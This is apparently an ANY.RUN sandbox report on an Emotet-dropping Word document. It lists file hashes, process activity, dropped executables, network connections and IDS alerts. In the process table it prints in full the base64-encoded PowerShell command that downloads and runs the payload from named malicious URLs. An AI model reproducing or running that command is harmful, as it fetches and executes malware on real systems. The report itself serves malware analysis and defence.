analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

DOC-Dokument

Full analysis: https://app.any.run/tasks/34447559-9cfb-4fff-8838-fbf7d697859f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 19, 2019, 08:58:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 19 07:19:00 2019, Last Saved Time/Date: Tue Feb 19 07:19:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 8, Security: 0
MD5:

C232AE60FB76B508105ADF0226C6B140

SHA1:

89045BE76B2CA2A6A6F5AB710DEE6B3324378EB8

SHA256:

302C618E5A37254146EE692EE80F4D2B31EC9DA23C8CD591894B29A57E769C72

SSDEEP:

6144:cG5/BnVfRFJ7KK9aHScdX9znGUy/KPVaRG7LrVMzCXjkN:c2n9R/lA5dX9znGURpLr+zCXjE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 194.exe (PID: 3812)
      • 194.exe (PID: 2776)
      • wabmetagen.exe (PID: 2228)
      • wabmetagen.exe (PID: 2880)
    • Downloads executable files from the Internet

      • powersheLl.exe (PID: 3308)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2228)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 2880)
    • Connects to CnC server

      • wabmetagen.exe (PID: 2880)
    • EMOTET was detected

      • wabmetagen.exe (PID: 2880)
  • SUSPICIOUS

    • Creates files in the user directory

      • powersheLl.exe (PID: 3308)
    • Executable content was dropped or overwritten

      • powersheLl.exe (PID: 3308)
      • 194.exe (PID: 2776)
    • Starts itself from another location

      • 194.exe (PID: 2776)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3456)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3456)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:02:19 07:19:00
ModifyDate: 2019:02:19 07:19:00
Pages: 1
Words: 1
Characters: 8
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 8
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 194.exe no specs 194.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3456"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC-Dokument.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3308powersheLl -e JABCAF8AXwAzADYAOQA0AD0AKAAnAEIANAAwACcAKwAnADAAXwAzACcAKQA7ACQATgA2AF8ANgAyADkAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABjADAAXwAxADkAXwA9ACgAJwBoAHQAdABwADoALwAvAGMAJwArACcAaABpACcAKwAnAGwAZQAnACsAJwB2AGUAbgAuAGMAbwBtACcAKwAnAC8AQwB5AEoAJwArACcARQBYAHgAJwArACcAUgBXAGQAVgAnACsAJwBpAEgAJwArACcAUgBrAF8AVwBpAFEAJwArACcAVwAnACsAJwBAAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AZQB1AHIAbwBiAGEAbgBkAHUAJwArACcAcwBlAGQAdABpACcAKwAnAHIAZQBzAC4AYwAnACsAJwBvAG0ALwB6AFAASABqAHgAJwArACcAZwBIAE8ATwBjAEUATABEAEQAdABAACcAKwAnAGgAJwArACcAdAB0AHAAOgAvAC8AYwAnACsAJwBsAGUAJwArACcAYQBuAGUAYQB0ACcAKwAnAG8AbAAnACsAJwBvACcAKwAnAGcAeQBiAGwAbwBnACcAKwAnAC4AJwArACcAYwAnACsAJwBvACcAKwAnAG0ALwBoACcAKwAnAHkAaQAnACsAJwBDACcAKwAnAHYASgBDAHQAdAB1AGkAJwArACcATAB3ACcAKwAnAEAAJwArACcAaAB0ACcAKwAnAHQAcAAnACsAJwA6AC8AJwArACcALwBmAGEAaAByAGUAZAAnACsAJwBkACcAKwAnAGkAbgAnACsAJwAuACcAKwAnAGkAJwArACcAbgBmACcAKwAnAG8ALwBkACcAKwAnAFQAawBRAFMAdwBqACcAKwAnAGYAVQBrAE4AJwArACcAdQAnACsAJwBCACcAKwAnAG4AdgAnACsAJwBAACcAKwAnAGgAdAB0AHAAOgAvAC8AbgBlAHUAbQAnACsAJwBhACcAKwAnAHQAaQBjACcAKwAnAG8AcwB1ACcAKwAnAHQAJwArACcAaQAnACsAJwBsAGkAegBhACcAKwAnAGQAJwArACcAbwAnACsAJwBzAC4AJwArACcAYwBvAG0ALwBCAFkAJwArACcAdwBNAHgAVQBOAGYAeQBTACcAKwAnAEQAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQATABfAF8AXwBfAF8AMQBfAD0AKAAnAEQAJwArACcANwBfADYANwBfACcAKQA7ACQAZAA2AF8AXwA3ADMAXwAwACAAPQAgACgAJwAxADkAJwArACcANAAnACkAOwAkAEwAXwA3AF8AOAA0AF8APQAoACcAdQAnACsAJwAwAF8AOQBfADYAOQAnACkAOwAkAEQAMgBfADgAXwAxADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGQANgBfAF8ANwAzAF8AMAArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEUAXwBfADIANAAzADMAXwAgAGkAbgAgACQAYwAwAF8AMQA5AF8AKQB7AHQAcgB5AHsAJABOADYAXwA2ADIAOQBfAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAXwBfADIANAAzADMAXwAsACAAJABEADIAXwA4AF8AMQA0ACkAOwAkAGYANABfAF8ANAAxADYAPQAoACcAUAA5AF8AXwA3AF8AJwArACcAOQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABEADIAXwA4AF8AMQA0ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQARAAyAF8AOABfADEANAA7ACQAbgAxADUAMABfADYANwAxAD0AKAAnAFgAOQA5AF8AXwAnACsAJwA1ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABrADcAXwA2ADkANgBfADAAPQAoACcAQwA0ACcAKwAnADIAXwA2ACcAKwAnADgAXwAwACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3812"C:\Users\admin\194.exe" C:\Users\admin\194.exepowersheLl.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2776"C:\Users\admin\194.exe"C:\Users\admin\194.exe
194.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2228"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
194.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2880"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 680
Read events
1 265
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3456WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8AE1.tmp.cvr
MD5:
SHA256:
3308powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2L3J90Z295M3S7RUZNU6.temp
MD5:
SHA256:
3456WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C360D4ABA2180976D5C30F5C9BF470B8
SHA256:A70EFA26D0608BE84A435FDFFE23D90868BC660A434D5C8CE84D214855CB93EA
3308powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19982f.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3308powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3308powersheLl.exeC:\Users\admin\194.exeexecutable
MD5:7369AB000F525421D2BEE44D02014560
SHA256:027E767DDEB7034AE97936036B85CCAB4D899696A687BBE6C7D520B7EFE05D84
3456WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C-Dokument.docpgc
MD5:861596702389FE9691A2080940E065CB
SHA256:2944A20E671E8A7ED9B490C9DB7D614E298FB66F5B5C7C45F0B41D5F483204C7
2776194.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:7369AB000F525421D2BEE44D02014560
SHA256:027E767DDEB7034AE97936036B85CCAB4D899696A687BBE6C7D520B7EFE05D84
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3308
powersheLl.exe
GET
200
66.70.176.6:80
http://chileven.com/CyJEXxRWdViHRk_WiQW/
CA
executable
214 Kb
suspicious
3308
powersheLl.exe
GET
301
66.70.176.6:80
http://chileven.com/CyJEXxRWdViHRk_WiQW
CA
html
248 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3308
powersheLl.exe
66.70.176.6:80
chileven.com
OVH SAS
CA
suspicious
2880
wabmetagen.exe
66.216.234.131:443
Charter Communications
US
malicious

DNS requests

Domain
IP
Reputation
chileven.com
  • 66.70.176.6
suspicious

Threats

PID
Process
Class
Message
3308
powersheLl.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3308
powersheLl.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3308
powersheLl.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2880
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info